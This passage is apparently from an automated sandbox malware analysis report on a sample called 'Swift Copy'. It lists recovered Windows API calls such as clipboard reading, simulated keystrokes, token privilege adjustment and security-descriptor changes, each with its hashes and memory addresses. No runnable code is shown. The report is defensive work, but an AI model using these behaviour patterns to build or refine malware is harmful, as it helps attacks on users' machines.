                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction ID: ee8d4f29dfae04ae5d557f7d51529eff16f6fbd0bf55479bbea64909b28a712e
                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                              • Instruction Fuzzy Hash: DC310475A00109DBC718EF59D4C0969FBA6FF49300B2886A5E909CF656D731EEC1CBE0
                                              APIs
                                              • Sleep.KERNELBASE(000001F4), ref: 00ED22B1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1678475420.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ed0000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                              • Instruction ID: 85ed8b4580444c0de48d52769cf3a628307fc9e3034303e0a097c44c11e015b3
                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                              • Instruction Fuzzy Hash: BAE0E67494010EDFDB00EFB4D54969E7FB4EF04301F100165FD01E2280D6319D509A72
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00E0961A
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E0965B
                                              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00E0969F
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E096C9
                                              • SendMessageW.USER32 ref: 00E096F2
                                              • GetKeyState.USER32(00000011), ref: 00E0978B
                                              • GetKeyState.USER32(00000009), ref: 00E09798
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E097AE
                                              • GetKeyState.USER32(00000010), ref: 00E097B8
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E097E9
                                              • SendMessageW.USER32 ref: 00E09810
                                              • SendMessageW.USER32(?,00001030,?,00E07E95), ref: 00E09918
                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00E0992E
                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00E09941
                                              • SetCapture.USER32(?), ref: 00E0994A
                                              • ClientToScreen.USER32(?,?), ref: 00E099AF
                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00E099BC
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E099D6
                                              • ReleaseCapture.USER32 ref: 00E099E1
                                              • GetCursorPos.USER32(?), ref: 00E09A19
                                              • ScreenToClient.USER32(?,?), ref: 00E09A26
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E09A80
                                              • SendMessageW.USER32 ref: 00E09AAE
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E09AEB
                                              • SendMessageW.USER32 ref: 00E09B1A
                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E09B3B
                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E09B4A
                                              • GetCursorPos.USER32(?), ref: 00E09B68
                                              • ScreenToClient.USER32(?,?), ref: 00E09B75
                                              • GetParent.USER32(?), ref: 00E09B93
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E09BFA
                                              • SendMessageW.USER32 ref: 00E09C2B
                                              • ClientToScreen.USER32(?,?), ref: 00E09C84
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E09CB4
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E09CDE
                                              • SendMessageW.USER32 ref: 00E09D01
                                              • ClientToScreen.USER32(?,?), ref: 00E09D4E
                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E09D82
                                                • Part of subcall function 00D89944: GetWindowLongW.USER32(?,000000EB), ref: 00D89952
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E09E05
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                              • String ID: @GUI_DRAGID$F$p#
                                              • API String ID: 3429851547-638943876
                                              • Opcode ID: ee6282894300014cf2a2c3b3b38177aa98e36eee744f6c3b41f8a2477debb6db
                                              • Instruction ID: 0ebe915e217ca16e6e2607140b060296bf25044b5ea74c0d90bfd6b4a7baf4ef
                                              • Opcode Fuzzy Hash: ee6282894300014cf2a2c3b3b38177aa98e36eee744f6c3b41f8a2477debb6db
                                              • Instruction Fuzzy Hash: 2842B134208201AFDB24CF24DC44EAABBE5FF89714F141619F699A72E2D732D895CF52
                                              APIs
                                              • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00E048F3
                                              • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00E04908
                                              • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00E04927
                                              • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00E0494B
                                              • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00E0495C
                                              • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00E0497B
                                              • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00E049AE
                                              • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00E049D4
                                              • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00E04A0F
                                              • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00E04A56
                                              • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00E04A7E
                                              • IsMenu.USER32(?), ref: 00E04A97
                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E04AF2
                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E04B20
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E04B94
                                              • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00E04BE3
                                              • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00E04C82
                                              • wsprintfW.USER32 ref: 00E04CAE
                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E04CC9
                                              • GetWindowTextW.USER32(?,00000000,00000001), ref: 00E04CF1
                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E04D13
                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E04D33
                                              • GetWindowTextW.USER32(?,00000000,00000001), ref: 00E04D5A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                              • String ID: %d/%02d/%02d
                                              • API String ID: 4054740463-328681919
                                              • Opcode ID: 7fe6209d75ac17420d33b14347daa88be0a6c8ab7c98dc85090050c1497edf9d
                                              • Instruction ID: 5c4aaee6e544ad5789e746dbf16eadaf916a140b261abebdd8c1ee72493920fb
                                              • Opcode Fuzzy Hash: 7fe6209d75ac17420d33b14347daa88be0a6c8ab7c98dc85090050c1497edf9d
                                              • Instruction Fuzzy Hash: 761200F1600205AFEB259F24CD49FAE7BB8EF85704F105229F615FA1E0DB749A81CB60
                                              APIs
                                              • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00D8F998
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DCF474
                                              • IsIconic.USER32(00000000), ref: 00DCF47D
                                              • ShowWindow.USER32(00000000,00000009), ref: 00DCF48A
                                              • SetForegroundWindow.USER32(00000000), ref: 00DCF494
                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DCF4AA
                                              • GetCurrentThreadId.KERNEL32 ref: 00DCF4B1
                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DCF4BD
                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00DCF4CE
                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00DCF4D6
                                              • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00DCF4DE
                                              • SetForegroundWindow.USER32(00000000), ref: 00DCF4E1
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DCF4F6
                                              • keybd_event.USER32(00000012,00000000), ref: 00DCF501
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DCF50B
                                              • keybd_event.USER32(00000012,00000000), ref: 00DCF510
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DCF519
                                              • keybd_event.USER32(00000012,00000000), ref: 00DCF51E
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DCF528
                                              • keybd_event.USER32(00000012,00000000), ref: 00DCF52D
                                              • SetForegroundWindow.USER32(00000000), ref: 00DCF530
                                              • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00DCF557
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 4125248594-2988720461
                                              • Opcode ID: 4fd8ef18237793e6bd8a0ade4893e0f9b021d516ee4459055bcf7ada4364814d
                                              • Instruction ID: f551485c64166c1ed86fb07bdfe64414333f816b27d2a2af46cc12e94bbc858d
                                              • Opcode Fuzzy Hash: 4fd8ef18237793e6bd8a0ade4893e0f9b021d516ee4459055bcf7ada4364814d
                                              • Instruction Fuzzy Hash: C1316571A402187FEB206BB69C49FBF7E6DEB44B50F24016AF601F71D1C6B29D40AA71
                                              APIs
                                                • Part of subcall function 00DD16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DD170D
                                                • Part of subcall function 00DD16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DD173A
                                                • Part of subcall function 00DD16C3: GetLastError.KERNEL32 ref: 00DD174A
                                              • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00DD1286
                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00DD12A8
                                              • CloseHandle.KERNEL32(?), ref: 00DD12B9
                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00DD12D1
                                              • GetProcessWindowStation.USER32 ref: 00DD12EA
                                              • SetProcessWindowStation.USER32(00000000), ref: 00DD12F4
                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00DD1310
                                                • Part of subcall function 00DD10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DD11FC), ref: 00DD10D4
                                                • Part of subcall function 00DD10BF: CloseHandle.KERNEL32(?,?,00DD11FC), ref: 00DD10E9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                              • String ID: $default$winsta0$Z
                                              • API String ID: 22674027-1808616255
                                              • Opcode ID: 7b418d6fe762cecc9d9220cce3a87295be4c459e97741a74828a0f180e8ff6fd
                                              • Instruction ID: 814d9808cc3074dde86d4c95a641df6d1c7c11652b54c2296654471fd6f049e1
                                              • Opcode Fuzzy Hash: 7b418d6fe762cecc9d9220cce3a87295be4c459e97741a74828a0f180e8ff6fd
                                              • Instruction Fuzzy Hash: C7817B75900209BFDF219FA5DC49BEE7BB9EF04704F18422AF910B62A0D7769985CB70
                                              APIs
                                                • Part of subcall function 00DD10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DD1114
                                                • Part of subcall function 00DD10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00DD0B9B,?,?,?), ref: 00DD1120
                                                • Part of subcall function 00DD10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DD0B9B,?,?,?), ref: 00DD112F
                                                • Part of subcall function 00DD10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00DD0B9B,?,?,?), ref: 00DD1136
                                                • Part of subcall function 00DD10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DD114D
                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DD0BCC
                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DD0C00
                                              • GetLengthSid.ADVAPI32(?), ref: 00DD0C17
                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00DD0C51
                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DD0C6D
                                              • GetLengthSid.ADVAPI32(?), ref: 00DD0C84
                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00DD0C8C
                                              • HeapAlloc.KERNEL32(00000000), ref: 00DD0C93
                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DD0CB4
                                              • CopySid.ADVAPI32(00000000), ref: 00DD0CBB
                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DD0CEA
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DD0D0C
                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DD0D1E
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0D45
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0D4C
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0D55
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0D5C
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0D65
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0D6C
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00DD0D78
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0D7F
                                                • Part of subcall function 00DD1193: GetProcessHeap.KERNEL32(00000008,00DD0BB1,?,00000000,?,00DD0BB1,?), ref: 00DD11A1
                                                • Part of subcall function 00DD1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00DD0BB1,?), ref: 00DD11A8
                                                • Part of subcall function 00DD1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00DD0BB1,?), ref: 00DD11B7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                              • String ID:
                                              • API String ID: 4175595110-0
                                              • Opcode ID: a7f9334530995c963768f7cfa647bf5e0fc39d6a095ba25edbd3b0a21f7132e2
                                              • Instruction ID: 30358d291a78cd4a28cfb2ffd5f8e58d179efe371718531698e72ddaf5fc45e3
                                              • Opcode Fuzzy Hash: a7f9334530995c963768f7cfa647bf5e0fc39d6a095ba25edbd3b0a21f7132e2
                                              • Instruction Fuzzy Hash: 6C71487690020AAFDF109FA5DC48BEEBBBDEF45300F184616E914A7291D771AA49CB70
                                              APIs
                                              • OpenClipboard.USER32(00E0CC08), ref: 00DEEB29
                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00DEEB37
                                              • GetClipboardData.USER32(0000000D), ref: 00DEEB43
                                              • CloseClipboard.USER32 ref: 00DEEB4F
                                              • GlobalLock.KERNEL32(00000000), ref: 00DEEB87
                                              • CloseClipboard.USER32 ref: 00DEEB91
                                              • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00DEEBBC
                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00DEEBC9
                                              • GetClipboardData.USER32(00000001), ref: 00DEEBD1
                                              • GlobalLock.KERNEL32(00000000), ref: 00DEEBE2
                                              • GlobalUnlock.KERNEL32(00000000,?), ref: 00DEEC22
                                              • IsClipboardFormatAvailable.USER32(0000000F), ref: 00DEEC38
                                              • GetClipboardData.USER32(0000000F), ref: 00DEEC44
                                              • GlobalLock.KERNEL32(00000000), ref: 00DEEC55
                                              • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00DEEC77
                                              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00DEEC94
                                              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00DEECD2
                                              • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00DEECF3
                                              • CountClipboardFormats.USER32 ref: 00DEED14
                                              • CloseClipboard.USER32 ref: 00DEED59
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                              • String ID:
                                              • API String ID: 420908878-0
                                              • Opcode ID: b725ba409e2573698a37862a5713cfe8c9befac606f0977a4a9edbd856c9e062
                                              • Instruction ID: ea206b3fffdb9920621f0301a96e29569fdb36519715931a687c37f5a1173a43
                                              • Opcode Fuzzy Hash: b725ba409e2573698a37862a5713cfe8c9befac606f0977a4a9edbd856c9e062
                                              • Instruction Fuzzy Hash: 6A61E3352042419FD310EF26DC95F2AB7A4EF84704F28461DF49A972A2DB72DD49CBB2
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00DE69BE
                                              • FindClose.KERNEL32(00000000), ref: 00DE6A12
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DE6A4E
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DE6A75
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DE6AB2
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DE6ADF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                              • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                              • API String ID: 3830820486-3289030164
                                              • Opcode ID: e3f1af4c1e32c130267b10c9d95bc9a5e2dff8d4d824b17b9072c52cf1d534a0
                                              • Instruction ID: 33607c4b15885bd3d0b1b995b1fd55c480d7b727312ed325a4f9b7aaab588d8a
                                              • Opcode Fuzzy Hash: e3f1af4c1e32c130267b10c9d95bc9a5e2dff8d4d824b17b9072c52cf1d534a0
                                              • Instruction Fuzzy Hash: F4D14F72508340AEC710EBA5C896EABB7ECEF98704F04891DF589D6191FB74DA44CB72
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00DE9663
                                              • GetFileAttributesW.KERNEL32(?), ref: 00DE96A1
                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00DE96BB
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00DE96D3
                                              • FindClose.KERNEL32(00000000), ref: 00DE96DE
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00DE96FA
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE974A
                                              • SetCurrentDirectoryW.KERNEL32(00E36B7C), ref: 00DE9768
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DE9772
                                              • FindClose.KERNEL32(00000000), ref: 00DE977F
                                              • FindClose.KERNEL32(00000000), ref: 00DE978F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                              • String ID: *.*
                                              • API String ID: 1409584000-438819550
                                              • Opcode ID: 8933412f636b6ba795bb7f5b6a389af7a1a0cc27776be957ca2fc217a2e2c52c
                                              • Instruction ID: 33d9c1f52789d8f3b990dbe8a7f233286d250fda054633067d536e50f04582ad
                                              • Opcode Fuzzy Hash: 8933412f636b6ba795bb7f5b6a389af7a1a0cc27776be957ca2fc217a2e2c52c
                                              • Instruction Fuzzy Hash: 7A31D2325026596EDF10BFB6EC58ADEB7AC9F09321F244166F804F20A1DB31D988CA34
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00DE97BE
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00DE9819
